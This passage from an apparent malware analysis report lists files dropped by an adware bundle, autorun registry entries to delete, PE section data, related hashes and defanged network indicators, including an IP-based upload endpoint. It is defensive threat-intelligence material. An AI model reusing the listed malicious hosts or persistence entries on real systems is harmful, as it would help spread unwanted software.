    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (81233 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (47508 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (5869 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (166653 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (8876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (44026 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (31448 bytes)
    %System%\WindowsPowerShell\v1.0\SETE2.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (7 bytes)
    %System%\SET3A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (49 bytes)
    %System%\winrm\0409\SET52.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETBC.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (1281 bytes)
    %WinDir%\Help\SETE0.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SETE8.tmp (16 bytes)
    %WinDir%\SECF3.tmp (1897 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (601 bytes)
    %System%\SET44.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (438 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (5 bytes)
    %System%\GroupPolicy\Adm\SET4F.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETBE.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETD7.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (5 bytes)
    %WinDir%\inf\SET34.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SETD3.tmp (6 bytes)
    %System%\wbem\SET1F.tmp (4 bytes)
    %System%\SET49.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (2 bytes)
    %System%\SET25.tmp (7433 bytes)
    %System%\SET20.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETE4.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETC1.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETD6.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (5 bytes)
    %System%\SET2A.tmp (1281 bytes)
    %WinDir%\inf\oem10.PNF (12902 bytes)
    %System%\WindowsPowerShell\v1.0\SETE6.tmp (40 bytes)
    %System%\SET2D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (18 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDD.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETE7.tmp (601 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (7 bytes)
    %System%\SET22.tmp (35 bytes)
    %System%\SET3D.tmp (1281 bytes)
    %WinDir%\comsetup.log (48646 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (20 bytes)
    %System%\SET29.tmp (22 bytes)
    %System%\SET2B.tmp (2 bytes)
    %System%\SET41.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (4185 bytes)
    %System%\SET2E.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETD1.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETD4.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (6 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (1 bytes)
    %System%\SET45.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (1425 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (12 bytes)
    %System%\SETDA.tmp (42 bytes)
    %System%\SET4C.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (8 bytes)
    %System%\SET4A.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (18248 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (17 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (40 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (9 bytes)
    %System%\SET27.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETC2.tmp (3 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\wbem\SET39.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (57 bytes)
    %System%\SET42.tmp (601 bytes)
    %System%\SET3E.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDC.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (1 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SET43.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (8 bytes)
    %System%\SET26.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETBD.tmp (2 bytes)
    %System%\SET21.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (2 bytes)
    %WinDir%\msmqinst.log (5468 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETE3.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (4 bytes)
    %System%\SET3C.tmp (35 bytes)
    %System%\SET32.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETE9.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETBF.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (11 bytes)
    %WinDir%\imsins.log (3792 bytes)
    %System%\SET46.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETDB.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (601 bytes)
    %System%\CatRoot2\dberr.txt (1037 bytes)
    %System%\GroupPolicy\Adm\SET37.tmp (2 bytes)
    %WinDir%\iis6.log (136883 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (15 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (7 bytes)
    %System%\SET48.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETC4.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (673 bytes)
    %WinDir%\inf\SET4D.tmp (38 bytes)
    %System%\SET28.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETCF.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SETE1.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (15 bytes)
    %System%\SET31.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (12 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETD8.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (27 bytes)
    %System%\SET3F.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETC5.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (7971 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETD0.tmp (2 bytes)
    %System%\SET2C.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (21 bytes)
    %WinDir%\KB968930.log (245685 bytes)
    %WinDir%\ntdtcsetup.log (22997 bytes)
    %System%\SET3B.tmp (2 bytes)
    %System%\SET4B.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (601 bytes)
    %WinDir%\inf\oem10.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (19 bytes)
    %System%\SET24.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDE.tmp (673 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (10 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SETE5.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (10 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\GroupPolicy\Adm\SET51.tmp (2 bytes)
    %System%\SET40.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETDF.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETC3.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETD5.tmp (7 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %WinDir%\inf\SET4E.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
    %System%\SET2F.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (1281 bytes)
    %System%\SET47.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (24 bytes)
    %System%\winrm\0409\SET38.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET50.tmp (12 bytes)
    %System%\SET30.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (22 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (6 bytes)
    %System%\SET23.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SETC0.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (61 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (13 bytes)
    %WinDir%\inf\SET33.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (4 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETD9.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (9 bytes)
    %WinDir%\assembly\tmp\PADGJMQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\4ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\I147AEHK\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\5NRUX036\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\UEILORUX\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\CWZ258BE\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\6QTWZ258\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\8RUX0369\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\M69DGJMP\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\1KNQUX03\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\VFILORUX\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\BVZ258BF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\PADGJMPT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\EVZ258BE\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\H258BFIL\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\5PSVY147\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\UEHKNQTW\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\AUX0369D\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\3MQTWZ36\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\H147BEHK\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\UIMQUZ37\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\7RVY147B\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (26169 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\69.87.192[1].htm (17186 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (166 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\YouTube Downloader.msi (7337 bytes)
    %Documents and Settings%\%current user%\Application Data\Call 2 Customer LLC\YouTube Downloader 1.0.0\install\disk1.cab (6081 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-MB3U6.tmp\07-04-2016_hwopt_3.0.10-1.tmp (3844 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.cmdline (426 bytes)
    %WinDir%\hwopt_12052016001648\AppSettings.config (592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.0.cs (676 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.cmdline (426 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.0.cs (676 bytes)
    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpEA.tmp (1 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1218 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RESE.tmp (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RES8.tmp (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RES6.tmp (2936 bytes)
    %WinDir%\Temp\RES14.tmp (2892 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RES10.tmp (2940 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RES4.tmp (2936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RESA.tmp (2936 bytes)
    %WinDir%\setupapi.log (4240 bytes)
    %Program Files%\FrivLauncher\FrivLauncher.exe (5054 bytes)
    %Documents and Settings%\%current user%\Application Data\XBox\SETF8.tmp (44854 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp (4 bytes)
    %Program Files%\FrivLauncher\uninst.exe (8693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\title.png (403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\topbg.png (1450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{01193C1E-21DF-4D50-8393-687E2938346B} (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\nsSkinEngine.dll (7767 bytes)
    %Documents and Settings%\All Users\Desktop\FrivLauncher.lnk (730 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\XBLive.exe (191491 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_feedback.png (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress_bg.png (903 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\progress.png (978 bytes)
    %WinDir%\Temp\{CD2F8BB9-5758-4151-B5BB-E507B7C16422} (34 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_close.png (711 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\FrivLauncher\FrivLauncher.lnk (742 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\checkbox.png (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\DownloadInstall.dll (9043 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\go184.7531c668845f402cb058ad10921a3520.zip (260891 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\Install.xml (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nshF7.tmp\install.inf (729 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_big.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_small.png (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskF5.tmp\btn_min.png (237 bytes)
    %Program Files%\FrivLauncher\FrivLauncher.exe.config (194 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\WinDivert.dll (18 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@demo1.geniesoftsystem[1].txt (1081 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\get_installation_detail[1].htm (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\Math.dll (2489 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getip[1].htm (43 bytes)
    %Documents and Settings%\%current user%\Application Data\master\Master.exe (83494 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\master\uninstaller.exe (1987 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfFA.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Application Data\master\MasterReports.dll (15300 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "GrpConv" = "grpconv -o"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "master" = "%Documents and Settings%\%current user%\Application Data\master\master.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: Language Neutral

Company Name: Product Name: Product Version: 1.0.0.0Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: Comments: Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409629324296964.50526419d4e1be1ac35a5db9c47f553b27cea
.rdata3686411118112643.11773cca1ca3fbf99570f6de9b43ce767f368
.data491524699165121.2510977f0839f8ebea31040e462523e1c770e
.ndata52019274137600d41d8cd98f00b204e9800998ecf8427e
.rsrc126156817024174081.690160bbd2f1bc316f3c3d0ace6d7a5ce946e
.reloc1282048405440961.09312ef47c39f20b68b98c681fcd9fd4f6838

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 3
4ae1505b614bcc4f36e88f69b9d2269b
115fe4a617dca139d1dad1a3b3e18d65
723e89e2d665897233e1afdfba6c50d4

Network Activity

URLs

URL IP
hxxp://genisys.online/browser.jsonp104.28.26.189
hxxp://178.33.69.66/upload.php
hxxp://microsoft.com/
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://69.87.192.155/
hxxp://hen2.microaol.net/api52.50.127.149
hxxp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip52.50.127.149
hxxp://www.microsoft.com/23.54.1.2
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe23.37.59.27
hxxp://www.microsoft.com/uk-ua/23.54.1.2
ssl.google-analytics.com216.58.214.200

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

